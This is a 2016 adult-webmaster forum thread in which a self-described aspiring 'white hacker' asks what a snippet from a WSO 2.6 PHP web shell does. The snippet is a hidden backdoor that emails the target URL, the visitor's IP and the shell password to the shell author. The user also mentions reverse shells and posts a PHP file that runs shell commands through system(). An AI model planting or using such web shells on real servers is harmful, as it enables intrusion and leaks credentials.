GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   What is this php? (https://gfy.com/showthread.php?t=1195958)

deonbell 05-06-2016 10:06 PM
What is this php?
 
PHP Code:
$visitc $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  0;
  $visitor $_SERVER["REMOTE_ADDR"];
  $web     $_SERVER["HTTP_HOST"];
  $inj     $_SERVER["REQUEST_URI"];
  $target  rawurldecode($web.$inj);
  $judul   "WSO 2.6 http://$target by $visitor";
  $body    "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }

I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

Here is all code.
"404 Not Found" By aLLiGaToR - Pastebin.com
Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

I only use code for good. I want to be a white hacker.

Spunky 05-06-2016 10:11 PM
It will never work

deonbell 05-06-2016 10:30 PM
Quote:
Originally Posted by Spunky (Post 20879615)
It will never work
Yes, I try pentest monkey shell and it not work at all. I delete base64 code from 404.php shell. I hope no more backdoors. And it works on old server running old php 5.5, but not on server with php 7. Maybe 404 php code defecated in php 7.

Thank for your help Spunky.

Spunky 05-06-2016 10:48 PM
I try to help the peoples

clickity click 05-07-2016 03:17 AM
Quote:
Originally Posted by deonbell (Post 20879612)
PHP Code:
$visitc $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  0;
  $visitor $_SERVER["REMOTE_ADDR"];
  $web     $_SERVER["HTTP_HOST"];
  $inj     $_SERVER["REQUEST_URI"];
  $target  rawurldecode($web.$inj);
  $judul   "WSO 2.6 http://$target by $visitor";
  $body    "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }


I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

Here is all code.
"404 Not Found" By aLLiGaToR - Pastebin.com
Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

I only use code for good. I want to be a white hacker.
What do you want to do with the shell?

HomerSimpson 05-07-2016 03:22 AM
When I try to open that pastebin my NOD32 says:
http://i.imgur.com/562EGvD.png

clickity click 05-07-2016 04:19 AM
Quote:
Originally Posted by HomerSimpson (Post 20879741)
When I try to open that pastebin my NOD32 says:
http://i.imgur.com/562EGvD.png
Well duh. It's a web shell.

CPA-Rush 05-07-2016 06:23 AM
https://github.com/rogierkn/PrettyBoot

Barry-xlovecam 05-07-2016 06:49 AM
:1orglaugh :1orglaugh Happy Hacking
k0d3k1dd13

deonbell 05-07-2016 11:53 AM
I think I don't need nice shell for proof of conception. I create a php file that shows I upload. I want to upload this to facebook or google and get money for finding bug. I will make similar files for asp and js. Then I get a money to buy new roller blades.

PHP Code:
<?php

echo "<h1>proof</h1>";
echo "<h1>who?</h1>";
system("who");
echo "<h2>Current Directory</h2>";
system("pwd");
echo "<h2>Files</h2>";
system("ls");
echo "<h2>Uname</h2>";
system("uname -a");


?>

Colmike9 05-07-2016 11:58 AM
People doing code bounties don't have to ask questions like this..


All times are GMT -7. The time now is 09:29 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc